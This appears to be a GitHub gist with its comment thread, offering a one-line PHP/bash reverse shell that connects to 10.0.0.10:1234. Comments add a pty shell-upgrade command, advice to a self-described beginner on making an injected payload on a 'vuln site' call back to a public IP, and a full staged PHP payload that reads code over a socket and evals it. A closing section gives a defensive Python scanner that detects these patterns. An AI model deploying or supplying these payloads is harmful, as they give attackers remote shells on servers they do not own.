A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
@ChickenLover


ChickenLover commented Aug 13, 2019

python -c 'import pty; pty.spawn("/bin/bash")'

@Serux


Serux commented Dec 4, 2019

This shell was writing duplicate input when using a netcat listener.
Removing the ampersand (&) solved my problem.

<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/10.0.0.10/1234 0>&1'");
@rshipp

Owner Author

rshipp commented Dec 18, 2019

note for anybody coming across this for whatever reason: i have zero tolerance for inappropriate comments on this or any project i control. be kind, or leave.

@nikkolai14


nikkolai14 commented May 8, 2020

Is the IP my physical or public IP?

@Serux


Serux commented May 8, 2020

If you want to connect to your computer within an intranet, or by VPN, then it is the physical IP.

(For example, if you are 192.168.1.2 and you want 192.168.1.3 to connect to you, you must use 192.168.1.2.)

If you want a machine on the internet to connect with you, it should be the public one, and you may need to configure port forwarding in your router configuration.
(So you open your local port, 192.168.1.2:1337, you configure your firewall and router to allow connections to your public address, for example 10.10.10.2:1337, and forward them to your computer; then from another computer on the internet you must use 10.10.10.2:1337.)

@nikkolai14


nikkolai14 commented May 8, 2020

@Serux

Thanks for the comment. If I understand you correctly,

Here are the steps I did:

  1. I use ngrok to publicly access my local site on the internet
  2. I start the nc in my terminal nc -nvlp 8080
  3. from the php script I use my physical ip then 8080
  4. I inject that remote url from a vuln site.
  5. the nc is now connected to that but the problem is that when I do commands it is on the webserver where I host my remote url

So what I want to achieve is to access the vuln site using the reverse shell. I am still a beginner, so forgive me for that. Is that possible?

thank you so much.

@Serux


Serux commented May 8, 2020

@nikkolai14

I had to search what ngrok was.

So ngrok makes a localhost port public, like localhost:3000->publicweb.ngrok.io, so at this point you have something like a public subdomain and a public ip that forwards the connections to your localhost.

So when you execute the php script, it runs on the server that hosts the file (localhost) and tries to connect to the desired ip.

If your ip is in the same network as the server, (or your routing table is configured to forward to another network) the server tries to make the connection serverip->yourcomputerip:8080

So the php is being executed on your server, not on another site. The file needs to be executed from the server that you want to connect to, so that the php on that system executes the bash command.

So if that other server (remote url) executes that php (you upload the file and open the url), you would need a public IP, because that server is on the internet and cannot find your physical IP. In this case you would need a public IP.

I hope this helps. Ask me if there is something that you don't understand.
I'm writing this on my phone and it is a bit difficult to structure the text.

@nikkolai14


nikkolai14 commented May 9, 2020

@Serux

Thank you so much for the reply. I'll try again with the public IP.

@SkyBoltDom


SkyBoltDom commented May 30, 2020

This will work with any operating system on a server. This is a module from Rapid7 that should be used with their handler but you don't have to. Keep in mind this is a staged payload.
/*<?php /**/ error_reporting(0); $ip = 'PUT YOUR IP'; $port = PUT YOUR PORT; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
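As an added defensive example (not part of the gist or of any comment above), the following Python scanner flags the two payload shapes this thread shows: the one-line `exec()` of a bash `/dev/tcp/` reverse shell, and the socket-read-then-`eval()` stager. The rule set, the `classify` verdict strings and the three sample PHP files are constructed for this example; the `10.0.0.10:1234` endpoint in the first sample simply echoes the gist's own placeholder, and the stager sample is a simplified sketch of the length-prefixed read described above, not the Rapid7 module.

```python
import re
from dataclasses import dataclass

# Constructed indicator rules. Each is a (name, regex) pair checked per line.
DEV_TCP = re.compile(r"/dev/tcp/(\d{1,3}(?:\.\d{1,3}){3})/(\d+)")
RULES = [
    ("bash_dev_tcp", DEV_TCP),
    ("interactive_bash", re.compile(r"bash\s+-i\b")),
    ("php_exec_sink", re.compile(
        r"\b(?:exec|shell_exec|system|passthru|popen|proc_open)\s*\(")),
    ("php_socket_source", re.compile(
        r"\b(?:fsockopen|stream_socket_client|socket_create|socket_connect)\s*\(")),
    ("php_eval", re.compile(r"\beval\s*\(|\bcreate_function\s*\(")),
    ("error_suppression", re.compile(r"error_reporting\s*\(\s*0\s*\)")),
]


@dataclass
class Finding:
    rule: str
    line: int
    excerpt: str


def scan_php(source: str):
    """Return every rule hit in the PHP source, in line order."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pat in RULES:
            m = pat.search(line)
            if m:
                findings.append(Finding(name, lineno, m.group(0)))
    return findings


def extract_endpoints(source: str):
    """Pull the listener ip:port out of any /dev/tcp/ redirection."""
    return sorted({f"{m.group(1)}:{m.group(2)}" for m in DEV_TCP.finditer(source)})


def classify(findings):
    """Combine hits into a verdict; single sinks alone only warrant review."""
    names = {f.rule for f in findings}
    if "bash_dev_tcp" in names and "php_exec_sink" in names:
        return "reverse-shell (bash /dev/tcp via exec)"
    if "php_socket_source" in names and "php_eval" in names:
        return "staged reverse-shell (socket read + eval)"
    if "php_exec_sink" in names or "php_eval" in names:
        return "suspicious (command/eval sink, review manually)"
    return "clean"


# Constructed samples. SAMPLE_TINY mirrors the gist's one-liner.
SAMPLE_TINY = """<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
"""

# Simplified sketch of a length-prefixed stager (placeholder endpoint).
SAMPLE_STAGER = """<?php
error_reporting(0);
$s = fsockopen('127.0.0.1', 4444);
$len = unpack("N", fread($s, 4))[1];
$b = '';
while (strlen($b) < $len) { $b .= fread($s, $len - strlen($b)); }
eval($b);
"""

SAMPLE_BENIGN = """<?php
$name = htmlspecialchars($_GET['name'] ?? 'world');
echo "Hello, $name";
"""


def report(source: str):
    findings = scan_php(source)
    return {
        "verdict": classify(findings),
        "endpoints": extract_endpoints(source),
        "hits": [(f.rule, f.line, f.excerpt) for f in findings],
    }


if __name__ == "__main__":
    for label, src in (("tiny", SAMPLE_TINY), ("stager", SAMPLE_STAGER),
                       ("benign", SAMPLE_BENIGN)):
        print(label, report(src))
```

Run it over files in an upload directory (or over captured process command lines, where the `/dev/tcp/` and `bash -i` rules apply unchanged) and feed the verdict plus the extracted endpoint to your alerting; the "suspicious" tier exists because legitimate PHP does call `exec()`, so only the source-plus-sink combinations are treated as confirmed.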
